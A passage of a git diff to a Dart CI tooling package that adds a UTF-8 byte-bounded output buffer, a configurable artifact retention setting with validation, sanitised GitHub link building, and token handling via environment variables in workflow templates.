6. Creates a starter `CHANGELOG.md` if none exists -7. Installs `.git/hooks/pre-commit` to auto-format staged `lib/` Dart files before every commit +7. Installs `.git/hooks/pre-commit` to auto-format staged Dart files under `lib/` before every commit 8. Adds `.runtime_ci/runs/` to `.gitignore` 9. Prints a summary of all actions taken and suggested next steps @@ -1249,7 +1249,7 @@ final exists = await commandExists('git'); **Jobs:** 1. `pre-check` — Skip bot commits (author `github-actions[bot]` or `[skip ci]`) -2. Optional `auto-format` — If `ci.features.format_check=true`, auto-format `lib/` and push `bot(format)` commit +2. Optional `auto-format` — If `ci.features.format_check=true`, runs `dart format --line-length .`, stages tracked `*.dart` updates, and pushes a `bot(format)` commit 3. **Single-platform mode** (default, `ci.platforms` missing or 1 entry): - `analyze-and-test` — Verify protos, run analysis, run tests 4. **Multi-platform mode** (`ci.platforms` has 2+ entries): @@ -1266,6 +1266,7 @@ final exists = await commandExists('git'); - `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via SHA-pinned `browser-actions/setup-chrome@v2.1.1` and runs `dart test -p chrome`. Configure via `ci.web_test`: - `concurrency` (1–32, default `1`): parallel test shards - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests +- `ci.artifact_retention_days`: Optional retention period for uploaded test artifacts (1–90, default `7`) **Key steps:** ```yaml diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 8673faa..8b463b3 100644 --- a/docs/cli/API_REFERENCE.md +++ b/docs/cli/API_REFERENCE.md @@ -109,6 +109,7 @@ All commands extend `Command` from the `args` package. - **TestCommand** - `name`: `'test'` - `description`: 'Run dart test.' + - `runWithRoot(String repoRoot)`: `static Future` - Execute managed tests against an explicit repository root. - **UpdateAllCommand** / **UpdateCommand** - `name`: `'update'` / `'update-all'` @@ -233,6 +234,9 @@ if (isGitInstalled) { - `warn(String msg)`: `static void` - `error(String msg)`: `static void` +- **Exit Utilities** + - `exitWithCode(int code)`: `Future` - Flushes stdout/stderr and then exits. + ### Release & Versioning - **ReleaseUtils** - `buildReleaseCommitMessage(...)`: `static String` @@ -269,17 +273,32 @@ if (isGitInstalled) { - `resolveToolingPackageRoot()`: `static String` - **RepoUtils** - `findRepoRoot()`: `static String?` + - `resolveTestLogDir(String repoRoot, {Map? environment})`: `static String` + - `isSymlinkPath(String path)`: `static bool` + - `ensureSafeDirectory(String dirPath)`: `static void` + - `writeFileSafely(String filePath, String content, {FileMode mode = FileMode.write})`: `static void` - **StepSummary** - - `write(String markdown)`: `static void` + - `write(String markdown, {Map? environment})`: `static void` - `artifactLink([String label = 'View all artifacts'])`: `static String` - `compareLink(String prevTag, String newTag, [String? label])`: `static String` - `ghLink(String label, String path)`: `static String` - `releaseLink(String tag)`: `static String` - `escapeHtml(String input)`: `static String` - `collapsible(String title, String content, {bool open = false})`: `static String` +- **TestFailure** + - Parsed failure record from NDJSON test output. + - Fields: `name`, `error`, `stackTrace`, `printOutput`, `durationMs`. +- **TestResults** + - Parsed aggregate test results. + - Fields: `passed`, `failed`, `skipped`, `totalDurationMs`, `failures`, `parsed`. - **TestResultsUtil** - `parseTestResultsJson(String jsonPath)`: `static TestResults` - - `writeTestJobSummary(TestResults results, int exitCode)`: `static void` + - `writeTestJobSummary(TestResults results, int exitCode, {String? platformId, void Function(String markdown)? writeSummary})`: `static void` +- **Utf8BoundedBuffer** + - `Utf8BoundedBuffer({required int maxBytes, required String truncationSuffix})` + - `append(String data)`: `void` + - `truncateToUtf8Bytes(String input, int maxBytes)`: `static String` + - `byteLength`, `isTruncated`, `isEmpty` - **TemplateResolver** - `resolvePackageRoot()`: `static String` - `resolveTemplatesDir()`: `static String` diff --git a/lib/src/cli/commands/init_command.dart b/lib/src/cli/commands/init_command.dart index cf9422f..ce162d6 100644 --- a/lib/src/cli/commands/init_command.dart +++ b/lib/src/cli/commands/init_command.dart @@ -134,6 +134,7 @@ class InitCommand extends Command { 'dart_sdk': '3.9.2', 'personal_access_token_secret': 'GITHUB_TOKEN', 'line_length': 120, + 'artifact_retention_days': 7, 'features': { 'proto': false, 'lfs': false, @@ -141,6 +142,8 @@ class InitCommand extends Command { 'analysis_cache': true, 'managed_analyze': true, 'managed_test': true, + 'build_runner': false, + 'web_test': false, }, 'secrets': {}, 'sub_packages': [], diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 7c9b602..00df5c1 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -12,6 +12,7 @@ import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; +import '../utils/utf8_bounded_buffer.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). @@ -55,17 +56,7 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - late final String logDir; - try { - logDir = RepoUtils.resolveTestLogDir(repoRoot); - RepoUtils.ensureSafeDirectory(logDir); - } on StateError catch (e) { - Logger.error('$e'); - await exitWithCode(1); - } on FileSystemException catch (e) { - Logger.error('Cannot use log directory: $e'); - await exitWithCode(1); - } + final logDir = await _resolveLogDirOrExit(repoRoot); Logger.info('Log directory: $logDir'); final jsonPath = p.join(logDir, 'results.json'); @@ -98,52 +89,19 @@ class TestCommand extends Command { final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing - // (byte-bounded to prevent OOM from runaway test output) - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - var stdoutBytes = 0; - var stderrBytes = 0; - var stdoutTruncated = false; - var stderrTruncated = false; + // (byte-bounded to prevent OOM from runaway test output). const truncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; - final truncationBytes = utf8.encode(truncationSuffix).length; + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: truncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: truncationSuffix); void onStdout(String data) { stdout.write(data); - if (stdoutTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { - stdoutBuf.write(data); - stdoutBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stdoutBytes - truncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stdoutBuf.write(truncationSuffix); - stdoutTruncated = true; - } + stdoutBuf.append(data); } void onStderr(String data) { stderr.write(data); - if (stderrTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stderrBytes + dataBytes <= _maxLogBufferBytes) { - stderrBuf.write(data); - stderrBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stderrBytes - truncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stderrBuf.write(truncationSuffix); - stderrTruncated = true; - } + stderrBuf.append(data); } final stdoutSub = process.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onStdout); @@ -175,7 +133,7 @@ class TestCommand extends Command { // Write console output to log files try { RepoUtils.writeFileSafely(p.join(logDir, 'dart_stdout.log'), stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { + if (!stderrBuf.isEmpty) { RepoUtils.writeFileSafely(p.join(logDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { @@ -249,7 +207,13 @@ class TestCommand extends Command { } final spLogDir = p.join(logDir, name); - Directory(spLogDir).createSync(recursive: true); + try { + RepoUtils.ensureSafeDirectory(spLogDir); + } on FileSystemException catch (e) { + Logger.error('Cannot use sub-package log directory for $name: $e'); + failures.add(name); + continue; + } final spJsonPath = p.join(spLogDir, 'results.json'); final spExpandedPath = p.join(spLogDir, 'expanded.txt'); @@ -268,51 +232,18 @@ class TestCommand extends Command { final spProcess = await Process.start(Platform.resolvedExecutable, spTestArgs, workingDirectory: dir); - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - var stdoutBytes = 0; - var stderrBytes = 0; - var stdoutTruncated = false; - var stderrTruncated = false; const spTruncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; - final spTruncationBytes = utf8.encode(spTruncationSuffix).length; + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: spTruncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: spTruncationSuffix); void onSpStdout(String data) { stdout.write(data); - if (stdoutTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { - stdoutBuf.write(data); - stdoutBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stdoutBytes - spTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stdoutBuf.write(spTruncationSuffix); - stdoutTruncated = true; - } + stdoutBuf.append(data); } void onSpStderr(String data) { stderr.write(data); - if (stderrTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stderrBytes + dataBytes <= _maxLogBufferBytes) { - stderrBuf.write(data); - stderrBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stderrBytes - spTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stderrBuf.write(spTruncationSuffix); - stderrTruncated = true; - } + stderrBuf.append(data); } final stdoutSub = spProcess.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStdout); @@ -340,7 +271,7 @@ class TestCommand extends Command { try { RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stdout.log'), stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { + if (!stderrBuf.isEmpty) { RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { @@ -383,47 +314,42 @@ class TestCommand extends Command { workingDirectory: workingDirectory, environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, ); - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - final stdoutBytes = [0]; - final stderrBytes = [0]; - final stdoutTruncated = [false]; - final stderrTruncated = [false]; const pubGetTruncationSuffix = '\n\n... (output truncated).'; - final pubGetTruncationBytes = utf8.encode(pubGetTruncationSuffix).length; - - void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { - if (truncated[0]) return; - final dataBytes = utf8.encode(data).length; - if (byteCount[0] + dataBytes <= maxBytes) { - buf.write(data); - byteCount[0] += dataBytes; - } else { - final remaining = maxBytes - byteCount[0] - pubGetTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - buf.write(pubGetTruncationSuffix); - truncated[0] = true; - } - } + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxPubGetBufferBytes, truncationSuffix: pubGetTruncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxPubGetBufferBytes, truncationSuffix: pubGetTruncationSuffix); + final stdoutDone = Completer(); + final stderrDone = Completer(); final stdoutSub = process.stdout .transform(Utf8Decoder(allowMalformed: true)) - .listen((data) => capWrite(stdoutBuf, data, _maxPubGetBufferBytes, stdoutTruncated, stdoutBytes)); + .listen( + (data) => stdoutBuf.append(data), + onDone: () => stdoutDone.complete(), + onError: (_) => stdoutDone.complete(), + ); final stderrSub = process.stderr .transform(Utf8Decoder(allowMalformed: true)) - .listen((data) => capWrite(stderrBuf, data, _maxPubGetBufferBytes, stderrTruncated, stderrBytes)); + .listen( + (data) => stderrBuf.append(data), + onDone: () => stderrDone.complete(), + onError: (_) => stderrDone.complete(), + ); try { final exitCode = await process.exitCode.timeout(timeout); + await Future.wait([ + stdoutDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + stderrDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + ]); await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); } on TimeoutException { onTimeout?.call(); await _killAndAwaitExit(process); try { + await Future.wait([ + stdoutDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + stderrDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + ]); await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); } catch (_) {} return null; @@ -448,4 +374,18 @@ class TestCommand extends Command { } return -1; } + + static Future _resolveLogDirOrExit(String repoRoot) async { + try { + final logDir = RepoUtils.resolveTestLogDir(repoRoot); + RepoUtils.ensureSafeDirectory(logDir); + return logDir; + } on StateError catch (e) { + Logger.error('$e'); + await exitWithCode(1); + } on FileSystemException catch (e) { + Logger.error('Cannot use log directory: $e'); + await exitWithCode(1); + } + } } diff --git a/lib/src/cli/commands/update_command.dart b/lib/src/cli/commands/update_command.dart index b6682fb..f91f052 100644 --- a/lib/src/cli/commands/update_command.dart +++ b/lib/src/cli/commands/update_command.dart @@ -527,7 +527,7 @@ class UpdateCommand extends Command { required String prefix, }) { for (final key in source.keys) { - if (key == '_comment') continue; + if (key == '_comment' || key.startsWith('_comment_')) continue; final fullKey = prefix.isEmpty ? key : '$prefix.$key'; if (!target.containsKey(key)) { diff --git a/lib/src/cli/utils/repo_utils.dart b/lib/src/cli/utils/repo_utils.dart index 57aea2b..b096ce8 100644 --- a/lib/src/cli/utils/repo_utils.dart +++ b/lib/src/cli/utils/repo_utils.dart @@ -51,6 +51,9 @@ abstract final class RepoUtils { final runnerTempRaw = env['RUNNER_TEMP']?.trim(); if (runnerTempRaw != null && runnerTempRaw.isNotEmpty) { + if (_controlChars.hasMatch(runnerTempRaw)) { + throw StateError('RUNNER_TEMP must not contain newlines or control characters'); + } final runnerTemp = p.normalize(runnerTempRaw); if (!(normalized == runnerTemp || p.isWithin(runnerTemp, normalized))) { throw StateError('TEST_LOG_DIR must be within RUNNER_TEMP: "$runnerTemp"'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 38f7455..7304602 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -9,6 +9,9 @@ import 'repo_utils.dart'; abstract final class StepSummary { /// Maximum safe size for $GITHUB_STEP_SUMMARY (1 MiB minus 4 KiB buffer). static const int _maxSummaryBytes = (1024 * 1024) - (4 * 1024); + static final RegExp _repoSlugPattern = RegExp(r'^[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+$'); + static final RegExp _numericPattern = RegExp(r'^\d+$'); + static final RegExp _refPattern = RegExp(r'^[A-Za-z0-9._/-]+$'); /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). @@ -39,33 +42,34 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY']; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']); final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; + if (!_numericPattern.hasMatch(runId)) return ''; return '[$label]($server/$repo/actions/runs/$runId)'; } /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; + final sha = _safeRef(Platform.environment['GITHUB_SHA']) ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -91,4 +95,28 @@ abstract final class StepSummary { .replaceAll('"', '"') .replaceAll("'", '''); } + + static String _safeGitHubServerUrl(String? raw) { + if (raw == null || raw.trim().isEmpty) return 'https://github.com'; + final parsed = Uri.tryParse(raw.trim()); + if (parsed == null || !parsed.isAbsolute) return 'https://github.com'; + if (parsed.scheme != 'https' && parsed.scheme != 'http') return 'https://github.com'; + if (parsed.host.isEmpty || parsed.userInfo.isNotEmpty) return 'https://github.com'; + final cleanPath = parsed.path.endsWith('/') ? parsed.path.substring(0, parsed.path.length - 1) : parsed.path; + return '${parsed.scheme}://${parsed.host}${parsed.hasPort ? ':${parsed.port}' : ''}$cleanPath'; + } + + static String? _safeRepoSlug(String? raw) { + if (raw == null || raw.trim().isEmpty) return null; + final trimmed = raw.trim(); + if (!_repoSlugPattern.hasMatch(trimmed)) return null; + return trimmed; + } + + static String? _safeRef(String? raw) { + if (raw == null || raw.trim().isEmpty) return null; + final trimmed = raw.trim(); + if (!_refPattern.hasMatch(trimmed)) return null; + return trimmed; + } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart index adb1ba1..3b91503 100644 --- a/lib/src/cli/utils/test_results_util.dart +++ b/lib/src/cli/utils/test_results_util.dart @@ -240,10 +240,9 @@ abstract final class TestResultsUtil { if (f.error.isNotEmpty) { final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); - final safeError = StepSummary.escapeHtml(error); - final fence = _codeFence(safeError); + final fence = _codeFence(error); buf.writeln(fence); - buf.writeln(safeError); + buf.writeln(error); buf.writeln(fence); buf.writeln(); } @@ -253,10 +252,9 @@ abstract final class TestResultsUtil { ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; buf.writeln('**Stack Trace:**'); - final safeStack = StepSummary.escapeHtml(stack); - final fence = _codeFence(safeStack); + final fence = _codeFence(stack); buf.writeln(fence); - buf.writeln(safeStack); + buf.writeln(stack); buf.writeln(fence); buf.writeln(); } @@ -266,10 +264,9 @@ abstract final class TestResultsUtil { final lineCount = trimmed.split('\n').length; final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); - final safePrint = StepSummary.escapeHtml(printPreview); - final fence = _codeFence(safePrint); + final fence = _codeFence(printPreview); buf.writeln(fence); - buf.writeln(safePrint); + buf.writeln(printPreview); buf.writeln(fence); buf.writeln(); } @@ -292,7 +289,7 @@ abstract final class TestResultsUtil { /// Returns a markdown code fence string that will not appear inside [content]. /// Handles adversarial content with long backtick runs by using fence length - /// strictly greater than max consecutive backticks (up to 128). + /// strictly greater than max consecutive backticks. static String _codeFence(String content) { var maxRun = 0; var run = 0; @@ -305,8 +302,8 @@ abstract final class TestResultsUtil { } } if (run > maxRun) maxRun = run; - // Fence must be longer than any backtick run in content; allow up to 128 - // to handle adversarial content without escaping. - return '`' * (maxRun + 1).clamp(3, 128); + // Fence must be longer than any backtick run in content. + // Content is already preview-truncated, so this is naturally bounded. + return '`' * (maxRun + 1 < 3 ? 3 : maxRun + 1); } } diff --git a/lib/src/cli/utils/utf8_bounded_buffer.dart b/lib/src/cli/utils/utf8_bounded_buffer.dart new file mode 100644 index 0000000..611bcea --- /dev/null +++ b/lib/src/cli/utils/utf8_bounded_buffer.dart @@ -0,0 +1,87 @@ +import 'dart:convert'; + +/// Collects text while enforcing a strict UTF-8 byte budget. +/// +/// When appended content would exceed [maxBytes], the buffer keeps the largest +/// valid UTF-8 prefix that fits, appends [truncationSuffix] (or a prefix of it +/// if needed), and marks itself truncated. Further appends are ignored. +class Utf8BoundedBuffer { + final int maxBytes; + final String truncationSuffix; + + final StringBuffer _buffer = StringBuffer(); + int _byteLength = 0; + bool _isTruncated = false; + + Utf8BoundedBuffer({required this.maxBytes, required this.truncationSuffix}) + : assert(maxBytes >= 0, 'maxBytes must be non-negative'); + + int get byteLength => _byteLength; + bool get isTruncated => _isTruncated; + bool get isEmpty => _buffer.isEmpty; + + @override + String toString() => _buffer.toString(); + + void append(String data) { + if (_isTruncated || data.isEmpty) { + return; + } + if (maxBytes <= 0) { + _isTruncated = true; + return; + } + + final dataBytes = utf8.encode(data).length; + if (_byteLength + dataBytes <= maxBytes) { + _buffer.write(data); + _byteLength += dataBytes; + return; + } + + final available = maxBytes - _byteLength; + if (available <= 0) { + _isTruncated = true; + return; + } + + final suffixBytes = utf8.encode(truncationSuffix).length; + final reservedForSuffix = suffixBytes < available ? suffixBytes : available; + final dataBudget = available - reservedForSuffix; + + if (dataBudget > 0) { + final prefix = truncateToUtf8Bytes(data, dataBudget); + if (prefix.isNotEmpty) { + _buffer.write(prefix); + _byteLength += utf8.encode(prefix).length; + } + } + + final remaining = maxBytes - _byteLength; + if (remaining > 0) { + final suffixPrefix = truncateToUtf8Bytes(truncationSuffix, remaining); + if (suffixPrefix.isNotEmpty) { + _buffer.write(suffixPrefix); + _byteLength += utf8.encode(suffixPrefix).length; + } + } + + _isTruncated = true; + } + + static String truncateToUtf8Bytes(String input, int maxBytes) { + if (maxBytes <= 0 || input.isEmpty) return ''; + if (utf8.encode(input).length <= maxBytes) return input; + + final out = StringBuffer(); + var used = 0; + for (final rune in input.runes) { + final chunk = String.fromCharCode(rune); + final chunkBytes = utf8.encode(chunk).length; + if (used + chunkBytes > maxBytes) break; + out.write(chunk); + used += chunkBytes; + } + return out.toString(); + } +} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 18195f8..2b1f5b5 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -240,8 +240,8 @@ class WorkflowGenerator { 'line_length': _resolveLineLength(ciConfig['line_length']), 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', - // Artifact retention: 7 days for test logs (policy applied consistently) - 'artifact_retention_days': '7', + // Artifact retention defaults to 7 days unless explicitly configured. + 'artifact_retention_days': _resolveArtifactRetentionDays(ciConfig['artifact_retention_days']), // Feature flags 'proto': features['proto'] == true, @@ -298,6 +298,15 @@ class WorkflowGenerator { return '120'; } + static String _resolveArtifactRetentionDays(dynamic raw) { + if (raw is int && raw >= 1 && raw <= 90) return '$raw'; + if (raw is String) { + final parsed = int.tryParse(raw.trim()); + if (parsed != null && parsed >= 1 && parsed <= 90) return '$parsed'; + } + return '7'; + } + /// Shared filter: extracts valid, normalized web test paths from config. static List _filteredWebTestPaths(Map ciConfig) { final webTestConfig = _getWebTestConfig(ciConfig); @@ -461,6 +470,30 @@ class WorkflowGenerator { } } } + final artifactRetention = ciConfig['artifact_retention_days']; + if (artifactRetention != null && artifactRetention is! int && artifactRetention is! String) { + errors.add('ci.artifact_retention_days must be a number or string, got ${artifactRetention.runtimeType}'); + } else if (artifactRetention is int) { + if (artifactRetention < 1 || artifactRetention > 90) { + errors.add('ci.artifact_retention_days must be between 1 and 90, got $artifactRetention'); + } + } else if (artifactRetention is String) { + final trimmed = artifactRetention.trim(); + if (trimmed.isEmpty) { + errors.add('ci.artifact_retention_days string must not be empty or whitespace-only'); + } else if (trimmed != artifactRetention) { + errors.add('ci.artifact_retention_days must not have leading/trailing whitespace'); + } else if (artifactRetention.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { + errors.add('ci.artifact_retention_days must not contain newlines or control characters'); + } else if (!RegExp(r'^\d+$').hasMatch(artifactRetention)) { + errors.add('ci.artifact_retention_days string must be digits only (e.g. 7), got "$artifactRetention"'); + } else { + final parsed = int.parse(artifactRetention); + if (parsed < 1 || parsed > 90) { + errors.add('ci.artifact_retention_days must be between 1 and 90, got $artifactRetention'); + } + } + } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! List) { @@ -677,6 +710,7 @@ class WorkflowGenerator { Logger.info(' Dart SDK: ${ciConfig['dart_sdk']}'); Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); + Logger.info(' Artifact retention days: ${_resolveArtifactRetentionDays(ciConfig['artifact_retention_days'])}'); final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); if (enabledFeatures.isNotEmpty) { diff --git a/templates/config.json b/templates/config.json index 3da8593..fbff096 100644 --- a/templates/config.json +++ b/templates/config.json @@ -65,6 +65,8 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, + "_comment_artifact_retention_days": "Optional: retention for uploaded test artifacts in days (1-90).", + "artifact_retention_days": 7, "personal_access_token_secret": "GITHUB_TOKEN", "features": { "proto": false, diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index be4dd4d..75cfddc 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -108,13 +108,14 @@ jobs: # ── shared:git-config ── keep in sync with multi_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -263,13 +264,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -377,13 +379,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global 